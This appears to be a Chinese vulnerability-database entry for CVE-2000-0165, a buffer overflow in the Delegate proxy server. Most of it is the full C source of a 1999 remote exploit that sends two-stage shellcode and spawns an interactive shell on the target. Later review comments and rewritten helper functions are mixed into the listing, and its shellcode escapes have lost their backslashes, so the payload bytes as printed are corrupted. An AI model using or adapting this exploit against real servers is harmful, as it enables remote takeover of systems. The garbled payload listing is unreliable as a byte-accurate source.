ETL Delegate缓冲区溢出漏洞
漏洞ID | 1105610 | 漏洞类型 | 未知 |
发布时间 | 1999-11-13 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0165 |
CNNVD-ID | CNNVD-199911-048 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Delegate是ElectroTechnicalLaboratory发布的代理服务器程序。Delegate存在许多没有进行缓冲区边界检查的漏洞,远程攻击者可以利用缓冲区溢出攻击在服务器上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/808/info
The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the original poster) unchecked buffers that could be exploited to remotely compromise the server.
/* delefate.c
* delegate 5.9.x - 6.0.x remote exploit
*
* public
*
* will open a shell with the privileges of the nobody user.
*
* 1999/13/11 by scut of teso [http://teso.scene.at/]
*
* word to whole team teso, ADM, w00w00, beavuh and stealth :).
* special thanks to xdr for donating a bit of his elite debugging skillz.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
#define XP_OFFSET 0xbfffe074 /* offset */
/* Base value of the return address that main() writes into shellcode1 at
 * XP_SHELLCODE_OFFSET.  It is a mutable global so that main() can add the
 * optional [offset-add] command-line argument to it before use. */
unsigned long int xp_off = XP_OFFSET;
/* you don't have to modify this :) i hope :)
*/
/* Descriptor number that main() patches into both payload arrays (at
 * XP_NETWORK_OFFSET and XP_SH2_FD1..3); the payloads assume the client
 * socket has this number inside the target process. */
#define XP_NETWORK_FD 12
#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
#define XP_SH2_FD1 0x00000011
#define XP_SH2_FD2 0x0000001d
#define XP_SH2_FD3 0x0000002a
/* ANSI colour sequences for the banner.  NOTE(review): this copy of the
 * listing has lost the backslash of the escape sequences, so "E[32m" is
 * the literal text E[32m rather than ESC [ 3 2 m; the same loss affects
 * the "n" line endings and the hex escapes of the payload arrays below.
 * Do not treat this page as a byte-accurate source for signatures. */
#define GREEN "E[32m"
#define BOLD "E[1m"
#define NORMAL "E[m"
#define RED "E[31m"
/* local functions
*/
void usage (void);
void shell (int socket);
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* because the buffer is rather small (256 bytes), we use a minimalistic
 * read() shellcode to increase the chances to hit a correct offset
 */
/* First-stage payload as published: NOP padding, a small read() stub,
 * then the return address and a CRLF.  main() overwrites one byte at
 * XP_NETWORK_OFFSET (descriptor number) and four bytes at
 * XP_SHELLCODE_OFFSET (little-endian return address) before sending.
 * NOTE(review): the "xNN" fragments below are plain ASCII text in this
 * copy (the backslash of every "\xNN" escape was dropped in extraction),
 * so the array does not hold the bytes the inline comments describe and
 * the patch offsets above no longer line up with its contents. */
unsigned char shellcode1[] =
"x77x68x6fx69x73x3ax2fx2fx61x20x62x20x31x20x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90"
/* 30 byte read() shellcode by scut */
"x33xd2x33xc0xebx03x59xebx05xe8xf8xffxffxffx80xc2"
"x10x03xcaxc1xc2x04xb0x03x33xdbxb3x0cxcdx80"
/* ^^ network fd */
"x82xe0xffxbf" /* return address */
"x0dx0a";
/* uid+chroot-break+shell shellcode by lamerz, thanks !
 * slightly modified by scut to take care of the network socket
 */
/* Second-stage payload as published; main() sends it one second after
 * the first stage and patches the descriptor number into it at
 * XP_SH2_FD1, XP_SH2_FD2 and XP_SH2_FD3.  NOTE(review): as with
 * shellcode1, the escapes in this copy have lost their backslashes, so
 * strlen() on this array counts ASCII characters, not payload bytes. */
unsigned char shellcode2[]=
"x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdbx89xd9"
"xb3x0cxb0x3fxcdx80x31xc0x31xdbx89xd9xb3x0cx41xb0"
"x3fxcdx80x31xc0x31xdbx89xd9xb3x0cx41x41xb0x3fxcd"
"x80x31xc0x31xdbx43x89xd9x41xb0x3fxcdx80xebx6bx5e"
"x31xc0x31xc9x8dx5ex01x88x46x04x66xb9xffx01xb0x27"
"xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31xdbx8d"
"x5ex08x89x43x02x31xc9xfexc9x31xc0x8dx5ex08xb0x0c"
"xcdx80xfexc9x75xf3x31xc0x88x46x09x8dx5ex08xb0x3d"
"xcdx80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46x07"
"x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56x0cxb0x0b"
"xcdx80x31xc0x31xdbxb0x01xcdx80xe8x90xffxffxffx30"
"x62x69x6ex30x73x68x31x2ex2ex31x31x76x6ex67";
/*
 * Print the usage banner to stdout and terminate the process with
 * EXIT_FAILURE.  Never returns.
 */
void
usage (void)
{
	static const char banner[] =
		GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "n"
		"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "nn"
		"usage.... : ./delefate <host> <port> [offset-add]n"
		"example.. : ./delefate localhost 8080 -100nn"
		"for brute forcing, try from -2000 to 500 in steps of 200nn";

	/* the banner contains no conversion specifiers, so fputs() emits
	 * exactly what printf() did */
	fputs (banner, stdout);
	exit (EXIT_FAILURE);
}
/*
 * Entry point.  Parses <host> <port> [offset-add], writes the chosen
 * return address and descriptor number into the two payload arrays,
 * connects with a 45 s timeout, sends both stages one second apart and
 * then hands the socket to shell().  Exits through usage() on bad
 * arguments and with EXIT_FAILURE if the connection fails.
 *
 * Review notes (listing left unchanged, it is historical):
 *  - the local `socket` shadows the socket(2) function;
 *  - `stack` is initialised but never used;
 *  - the port comes from atoi(), which cannot report bad input;
 *  - "%08x" is handed an unsigned long (xp_off), a format mismatch
 *    that only happens to work where long is 32 bits;
 *  - the write() return values are ignored, and strlen() is applied to
 *    unsigned char arrays (prototype mismatch), stopping at the first
 *    NUL byte if the array ever contained one.
 */
int
main (int argc, char **argv)
{
int socket;
char *server;
struct sockaddr_in sa;
unsigned short int port_dest;
unsigned char *retaddr_ptr;
unsigned long int offset;
unsigned char *stack = NULL;
if (argc < 3)
usage ();
printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "n"
"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "nn");
/* optional third argument adjusts the global base offset; a negative
 * value relies on unsigned wrap-around, which is well defined */
if (argc == 4) {
long int xp_add = 0;
if (sscanf (argv[3], "%ld", &xp_add) != 1) {
usage ();
}
xp_off += xp_add;
}
printf (" " GREEN "-" NORMAL " using offset 0x%08xn", xp_off);
server = argv[1];
port_dest = atoi (argv[2]);
/* do the offset
*/
/* store xp_off + XP_DIFF little-endian, byte by byte, at the return
 * address slot of the first stage */
retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
offset = xp_off + XP_DIFF;
*retaddr_ptr = (offset & 0x000000ff) >> 0;
*(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
*(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
*(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
/* same descriptor number in both stages */
*(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
fflush (stdout);
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0) {
printf (" " RED BOLD "failed" NORMAL ".n");
perror ("net_connect");
exit (EXIT_FAILURE);
}
printf (" " GREEN BOLD "connected." NORMAL "n");
/* send minimalistic read() shellcode */
printf (" " GREEN "-" NORMAL " sending first shellcode...n");
write (socket, shellcode1, strlen (shellcode1));
sleep (1);
/* now send the real shellcode :-) */
printf (" " GREEN "-" NORMAL " sending second shellcode...n");
write (socket, shellcode2, strlen (shellcode2));
printf (" " GREEN "-" NORMAL " spawning shell...nn");
shell (socket);
close (socket);
exit (EXIT_SUCCESS);
}
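/*
 * Resolve `host` -- a dotted-quad literal or a DNS name -- to an IPv4
 * address.
 *
 * Returns the address in network byte order, widened to unsigned long,
 * or 0 on failure (0 is not a usable destination, which is how the caller
 * detects failure).  errno is not meaningful on failure: the resolver
 * reports through h_errno.  Like inet_addr() itself, this cannot tell
 * the literal 255.255.255.255 apart from a parse failure.
 *
 * Fixes over the original:
 *  - inet_addr() returns in_addr_t (32-bit unsigned).  Keeping the result
 *    in a `long` and testing `== -1` only works where long is 32 bits;
 *    on LP64 INADDR_NONE became 4294967295 and was returned as if it
 *    were a valid address.
 *  - `*(unsigned long *) he->h_addr` read sizeof(unsigned long) bytes
 *    from a 4-byte address (an over-read on LP64 and a strict-aliasing
 *    violation everywhere); the bytes are now copied with memcpy().
 *  - NULL / empty input and non-AF_INET answers are rejected instead of
 *    being dereferenced.
 */
unsigned long int
net_resolve (char *host)
{
	in_addr_t literal;
	in_addr_t addr;
	struct hostent *he;

	if (host == NULL || host[0] == '\0')
		return (0);

	/* literal addresses first; inet_addr() signals failure with INADDR_NONE */
	literal = inet_addr (host);
	if (literal != INADDR_NONE)
		return ((unsigned long int) literal);

	he = gethostbyname (host);
	if (he == NULL || he->h_addrtype != AF_INET
	    || he->h_addr_list == NULL || he->h_addr_list[0] == NULL
	    || he->h_length != (int) sizeof addr)
		return (0);

	/* copy exactly the four address bytes: no wider read, no aliasing cast */
	memcpy (&addr, he->h_addr_list[0], sizeof addr);
	return ((unsigned long int) addr);
}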
/* original version by typo, modified by scut
 */
/*
 * Relay bytes between stdin/stdout and `socket` until either side
 * reports EOF or an error (read() <= 0), then return.
 *
 * Review notes (listing left unchanged):
 *  - `fds` is never cleared with FD_ZERO(), so select() is handed an
 *    uninitialised fd_set: undefined behaviour that may surface as
 *    spurious readiness or an EBADF failure;
 *  - the select() return value is ignored, so a failure spins the loop;
 *  - write() return values are ignored, so a short write drops data;
 *  - the parameter name shadows the socket(2) function.
 */
void
shell (int socket)
{
char io_buf[1024];
int n;
fd_set fds;
while (1) {
FD_SET (0, &fds);
FD_SET (socket, &fds);
select (socket + 1, &fds, NULL, NULL, NULL);
/* keyboard -> peer */
if (FD_ISSET (0, &fds)) {
n = read (0, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (socket, io_buf, n);
}
/* peer -> screen */
if (FD_ISSET (socket, &fds)) {
n = read (socket, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (1, io_buf, n);
}
}
}
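/*
 * Open a TCP connection to server:port, waiting at most `sec` seconds for
 * the non-blocking connect() to complete.  *cs is filled with the
 * resolved destination (AF_INET, network byte order) as a side effect.
 *
 * Returns the connected descriptor, restored to blocking mode, or -1.
 * On -1 errno holds ETIMEDOUT if the wait expired, the pending connect()
 * error read from SO_ERROR if the peer rejected the connection, or the
 * error of the failing system call.  If the name cannot be resolved the
 * result is -1 and errno is not meaningful (net_resolve() returns 0).
 *
 * Fixes over the original:
 *  - the descriptor leaked on the select(), getsockopt(), SO_ERROR and
 *    final fcntl() failure paths; every failure now goes through `fail:`,
 *    which closes it while preserving errno;
 *  - getsockopt() takes a socklen_t length, not an int;
 *  - a descriptor that became writable without also being readable was
 *    accepted without consulting SO_ERROR; the pending error is now read
 *    whenever select() reports the descriptor ready.
 */
int
net_connect (struct sockaddr_in *cs, char *server,
	     unsigned short int port, int sec)
{
	int fd, flags, n, saved_errno;
	int so_error = 0;
	socklen_t so_len = sizeof so_error;
	struct timeval tv;
	fd_set rset, wset;

	memset (cs, 0, sizeof *cs);
	cs->sin_family = AF_INET;
	cs->sin_port = htons (port);

	/* resolve before creating the socket so there is nothing to leak */
	cs->sin_addr.s_addr = (in_addr_t) net_resolve (server);
	if (cs->sin_addr.s_addr == 0)
		return (-1);

	fd = socket (AF_INET, SOCK_STREAM, 0);
	if (fd == -1)
		return (-1);

	flags = fcntl (fd, F_GETFL, 0);
	if (flags == -1)
		goto fail;
	if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
		goto fail;

	n = connect (fd, (struct sockaddr *) cs, sizeof *cs);
	if (n == 0)
		goto done;		/* completed immediately */
	if (errno != EINPROGRESS)
		goto fail;

	FD_ZERO (&rset);
	FD_ZERO (&wset);
	FD_SET (fd, &rset);
	FD_SET (fd, &wset);
	tv.tv_sec = sec;
	tv.tv_usec = 0;

	n = select (fd + 1, &rset, &wset, NULL, &tv);
	if (n == -1)
		goto fail;
	if (n == 0) {
		errno = ETIMEDOUT;
		goto fail;
	}

	/* ready for reading and/or writing: the real outcome of connect()
	 * is only visible through SO_ERROR */
	if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &so_error, &so_len) == -1)
		goto fail;
	if (so_error != 0) {
		errno = so_error;
		goto fail;
	}

done:
	/* hand the caller a blocking descriptor again */
	if (fcntl (fd, F_SETFL, flags) == -1)
		goto fail;
	return (fd);

fail:
	saved_errno = errno;
	close (fd);
	errno = saved_errno;
	return (-1);
}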
|参考资料
来源:FREEBSD
名称:FreeBSD-SA-00:04
链接:http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-15&msg=[email protected]
来源:CIAC
名称:K-023
链接:http://www.ciac.org/ciac/bulletins/k-023.shtml
来源:NSFOCUS
名称:100
链接:http://www.nsfocus.net/vulndb/100